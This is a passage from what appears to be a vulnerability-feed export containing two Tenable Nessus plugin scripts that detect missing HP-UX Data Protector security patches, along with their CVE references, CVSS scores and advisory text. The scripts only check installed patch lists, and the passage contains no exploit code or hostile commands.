"title": "HP-UX PHSS_36800 : s700_800 11.23 OV DP5.50 IA-64 patch - CS packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36800. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43139);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36800 : s700_800 11.23 OV DP5.50 IA-64 patch - CS packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 OV DP5.50 IA-64 patch - CS packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36800 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_36800 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36800\", \"PHSS_37828\", \"PHSS_38727\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CS\", version:\"A.05.50\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:50:54", "bulletinFamily": "scanner", "description": "s700_800 11.X OV DP6.00 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)", "modified": "2019-12-02T00:00:00", "id": "HPUX_PHSS_36623.NASL", "href": "https://www.tenable.com/plugins/nessus/43137", "published": "2009-12-14T00:00:00", "title": "HP-UX PHSS_36623 : s700_800 11.X OV DP6.00 IA-64 patch - CORE packet", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_36623. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43137);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-2280\", \"CVE-2007-2281\", \"CVE-2009-3844\");\n script_xref(name:\"TRA\", value:\"TRA-2009-04\");\n script_xref(name:\"HP\", value:\"emr_na-c01124817\");\n script_xref(name:\"HP\", value:\"emr_na-c01943909\");\n script_xref(name:\"HP\", value:\"SSRT061258\");\n script_xref(name:\"HP\", value:\"SSRT061259\");\n script_xref(name:\"HP\", value:\"SSRT090113\");\n\n script_name(english:\"HP-UX PHSS_36623 : s700_800 11.X OV DP6.00 IA-64 patch - CORE packet\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV DP6.00 IA-64 patch - CORE packet : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential security vulnerability has been identified\n with OpenView Data Protector Application Recovery\n Manager version 5.5 and 6.0. The vulnerability could be\n exploited remotely to create a denial of service (DoS).\n (HPSBMA02481 SSRT090113)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Storage Data Protector running on\n HP-UX, Windows, Linux and Solaris. These vulnerabilities\n could be exploited remotely to execute arbitrary code.\n (HPSBMA02252 SSRT061258, SSRT061259)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-04\");\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5bd45cd2\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01943909\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0a593fc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_36623 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_36623 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_36623\", \"PHSS_37174\", \"PHSS_37817\", \"PHSS_38403\", \"PHSS_38742\", \"PHSS_38944\", \"PHSS_39016\", \"PHSS_39731\", \"PHSS_40080\", \"PHSS_40563\", \"PHSS_41262\", \"PHSS_41867\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-CORE-IS\", version:\"A.06.00\")) flag++;\nif (hpux_check_patch(app:\"DATA-PROTECTOR.OMNI-INTEG-P\", version:\"A.06.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}